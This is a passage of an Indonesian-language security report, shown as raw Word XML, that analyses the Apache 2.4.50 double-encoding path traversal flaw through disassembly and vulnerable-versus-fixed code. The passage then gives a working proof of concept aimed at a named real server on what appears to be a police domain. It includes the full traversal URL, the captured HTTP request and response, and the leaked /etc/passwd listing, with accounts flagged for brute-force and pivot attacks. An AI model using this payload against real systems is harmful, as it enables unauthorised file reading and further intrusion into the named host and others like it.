    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1AC78B1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00481235  MOVZX   EAX, BYTE PTR [RBX]          ; load *src</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="273CC5C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00481238  CMP     AL, 0x25                      ; '%' == 0x25?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1C254B2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0048123A  JNE     .not_percent                  ; skip if not '%'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="028EB55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3EAF1837" wp14:textId="4BA4669B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; Decode %XX sequence (CALLED ONLY ONCE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single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pass)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="69F9FED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0048123C  MOVZX   EDI, BYTE PTR [RBX+1]        ; load src[1]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="745455B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00481240  MOVZX   ESI, BYTE PTR [RBX+2]        ; load src[2]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6413861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00481244  CALL    hex_to_uchar                  ; decode 1x ONLY</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="66E8DF9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494A9F2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; ★★ KEY FLAW: CMP against 0x2E (dot character)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7062F1C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00481249  CMP     AL, 0x2E                      ; is decoded char '.'?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="471C0E0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0048124B  JE      .handle_dot                   ; YES → check traversal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5B679DD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; For %%32%65: hex_to_uchar('%','3') or similar → NOT 0x2E</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0A9F594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; Therefore JE is NOT taken → traversal bypasses check</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="637F08B6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49D13917" wp14:textId="480C4CE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; Store decoded char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NO SECOND DECODE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4285031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0048124D  MOV     BYTE PTR [R14], AL            ; *dst = decoded_char</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4E9CCE8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00481250  INC     R14                           ; dst++</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5D92E1B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00481253  ADD     RBX, 0x3                      ; src += 3 (skip %XX)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="33066D26" wp14:textId="60585A3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00481257  JMP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.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main_loop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   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;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NEXT CHAR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no re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decode!</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5F93075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67B2399C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; ── Root Cause Summary ─────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="650E6DE6" wp14:textId="5B0B9FC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; ADD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RBX, 0x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3  advances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past the decoded sequence without re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checking.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3E194E10" wp14:textId="79994ED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; If input is %%32%65 (double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encoded dot):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0FD1D01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;   First '%' triggers the percent branch</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0E6DD78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;   hex_to_uchar('%', '3') ≠ 0x2E (not a dot) → JE not taken</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="43E49441" wp14:textId="7A82744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;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Result stored as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is, traversal detection bypassed entirely.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="586418F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; The fix in 2.4.51 added iterative decoding until no more %XX found.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="08CE6F91" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="580D68E4" wp14:textId="57791D01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9.4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Perbandingan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Kode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Vulnerable vs Fixed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3CFFFFC7" w14:paraId="03637E16" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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DB00" wp14:textId="3653D0CC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 xml:space="preserve">Apache 2.4.50 </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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 xml:space="preserve"> VULNERABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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5F2B" wp14:textId="5CB4880B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 xml:space="preserve">Apache 2.4.51 </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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</w:rPr>
              <w:t xml:space="preserve"> FIXED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="432501E4" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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957E" wp14:textId="566D23C6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/* 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Single</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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pass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decode */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689451F5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if (*src == '%') {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3118E9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c = hex_to_uchar(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="626EC1DF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      src[1], src[2]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22CA298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 if (c == '.') {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="443BD618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  goto handle_dot;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6440EC0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 }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32AC6167" wp14:textId="6A268CA5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 /* NO re</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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>-</w:t>
            </w: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>decode */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="177864D1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*dst++ = c;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6F1FC4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src += 3;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AE40A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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513C88A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/* %%32%65 bypasses check */</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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A2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F2AE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/* Iterative decode loop */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD1969B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>while (*src == '%') {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B3E3AB3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c = hex_to_uchar(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49D5A676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      src[1], src[2]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1BCCA6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if (!isxdigit(src[1]) ||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60E9B8F7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    !isxdigit(src[2]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACE6FE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   break;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65924A38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src += 3;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659C9BB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  if (c == '.') {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3853A0D2" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="9ECE6A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    goto handle_dot; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE5840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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3183C19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9ECE6A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/* Double encoding caught */</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="61CDCEAD" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="269FC651" wp14:textId="554418A6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9.5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Fungsi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Fungsi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Terkait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Dianalisis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di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Ghidra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900"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="31C6CC2A" wp14:textId="77777777"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9F32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Nama Fungsi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E9B3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File Sumber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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291E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Alamat (approx)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B889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Relevansi Keamanan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="21C23054" wp14:textId="77777777"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F64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ap_normalize_path()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BF14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server/util.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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CC66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0x00481200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6D70" wp14:textId="4CA99781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FUNGSI UTAMA RENTAN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single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pass decode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="6701A79F" wp14:textId="77777777"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B8A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ap_unescape_url()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2054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server/util.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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B543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0x00480A10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6548" wp14:textId="5329E07B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URL decoding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awal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tidak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loop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untuk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double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encoded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="31677B20" wp14:textId="77777777"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799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ap_getparents()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0160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server/util.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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1A83D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0x00480E80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ECE1" wp14:textId="48CE32F8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Resolusi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..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/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dipanggil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SETELAH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normalisasi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(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terlambat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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="739EC384" wp14:textId="77777777"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49A5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hex_to_uchar()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9D9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include/util.h (inline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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5B9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0x00480C20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78E0" wp14:textId="36B9C94E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Konversi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%XX → byte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hanya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satu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level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="656E44CF" wp14:textId="77777777"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0BBD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ap_process_request_internal()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10DD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server/request.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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CE7C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0x004A1200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5D81" wp14:textId="0171B0AC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Titik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entry request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memanggil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ap_normalize_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="429D3279" wp14:textId="77777777"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85C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default_handler()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CE93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modules/http/http_core.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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1E16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0x004B3000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945D" wp14:textId="0EA1CE5C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Handler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akhir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meneruskan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path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ke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filesystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="3237699D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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4120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ap_run_translate_name()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F18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server/config.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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686C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0x0049E400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D84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Hook translasi URL ke path filesystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6BB9E253" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2F1D121C" wp14:textId="3C6A5847">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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 xml:space="preserve">10. Proof of Concept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 xml:space="preserve"> Path Traversal (File Read)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="553F28A4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Fase eksploitasi pertama membuktikan kemampuan membaca file arbitrer di luar document root. Target adalah file /etc/passwd yang merupakan database pengguna sistem dan merupakan bukti standar keberhasilan path traversal attack.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="573C91ED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10.1 Konstruksi Payload</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5385931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Menghitung jumlah level traversal yang dibutuhkan:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="51E705B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Document root: /var/www/html (asumsi standar)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1F3DE93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Target file  : /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="10CBCCE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Start path   : /icons/ (direktori yang dapat diakses)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1E72ADE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18C931E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Path dari /icons/ ke root: harus naik setidaknya 3 level</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1F999C03" wp14:textId="4AE5650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Best practice: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gunakan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7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8 level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untuk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memastikan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mencapai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root</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1D89B85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( /icons/../../../../../../../etc/passwd )</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3C7B8B6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3717216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Payload path traversal dalam double encoding:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4770935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Level 1: %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="404E827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Level 2: %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="32421D0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Level 3: %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6135A61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Level 4: %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="12DCCC0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Level 5: %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5E18CF6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Level 6: %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="27338DA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Level 7: %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7487D73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Target  : etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1159625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0F6D0A7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Full URL:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3DD29BF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http://dumaspresisi.itwasum.polri.go.id:8080/icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="23DE523C" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2693441E" wp14:textId="02CE5259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10.2 HTTP Request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 Burp Suite Capture</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6EC7FEF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GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1FD6570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Host: dumaspresisi.itwasum.polri.go.id:8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="637ED2CF" wp14:textId="4E699143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User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Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2177D15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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3506FD47" wp14:textId="2AED0B4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Accept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Language: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en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US,en;q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=0.5</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="65096FD4" wp14:textId="326E79A2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Accept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Encoding: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gzip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, deflate</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6E05C62C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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="74C68B03" wp14:textId="13AD6D61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Upgrade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Insecure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Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="52E56223" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54637FC3" wp14:textId="2B4B5E52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10.3 HTTP Response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 Server 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="512E193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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1E30687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Date: Sun, 07 Jan 2024 15:26:34 GMT</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="689DAE5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Server: Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7096EDF2" wp14:textId="59ADB3C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Last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Modified: Thu, 14 Apr 2022 15:56:29 GMT</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="557BFB09" wp14:textId="213B92D2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Accept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Ranges: bytes</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="56AC095A" wp14:textId="5EBEA12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Length: 1820</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5A46AD7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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7988F22E" wp14:textId="03D91D8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Type: text/plain</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="06ED1C0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5F66CD74" wp14:textId="7CDAE45A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[BODY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Isi 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etc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/passwd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lihat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Section 10.4]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="07547A01" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2F6F0C00" wp14:textId="66DE461E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10.4 Result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Isi /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etc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/passwd (Full Disclosure)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CFFFFC7" w14:paraId="6B684DFA" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="FDED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FC078" wp14:textId="02792DCC"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File /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etc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/passwd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berhasil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dibaca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. Akun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dengan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shell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aktif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(/bin/bash): root (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uid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=0), infra (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uid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=1000),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admdumas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(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uid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=1001),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webuzo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(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uid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=996), emps (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uid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=994). Akun</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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akun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ini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menjadi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target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potensial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untuk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serangan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brute force SSH, credential stuffing, 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>atau</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> pivot attack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5043CB0F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1B47BDE3" wp14:textId="718B6C70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root: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x:0:0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:root:/root:/bin/bash                          ← ROOT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KRITIS</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="75C2797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bin:x:1:1:bin:/bin:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4B3B01C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daemon:x:2:2:daemon:/sbin:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="47355ED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adm:x:3:4:adm:/var/adm:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7CBCBB5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lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5DB77D2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sync:x:5:0:sync:/sbin:/bin/sync</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="738C5C5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shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4D856CF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halt:x:7:0:halt:/sbin:/sbin/halt</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="057FBE2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mail:x:8:12:mail:/var/spool/mail:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4969A3A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operator:x:11:0:operator:/root:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4B7F441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games:x:12:100:games:/usr/games:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="67F34AF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ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7117B0F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nobody:x:99:99:Nobody:/:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7B112D0D" wp14:textId="5DA0E09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systemd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network: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x:192:192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:systemd Network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Mgmt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:/:/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sbin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nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="103385F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dbus:x:81:81:System message bus:/:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="024E254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polkitd:x:999:998:User for polkitd:/:/sbin/nologin</w:t>
      </w:r>
    </w:p>
